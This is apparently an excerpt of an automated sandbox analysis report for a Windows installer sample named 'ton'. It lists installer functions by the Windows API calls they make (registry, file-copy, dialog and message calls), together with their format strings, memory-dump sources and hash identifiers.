                                                                                                                                                                                                                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                      • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429A95,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                      • String ID: Version
                                                                                                                                                                                                                                                                                                      • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
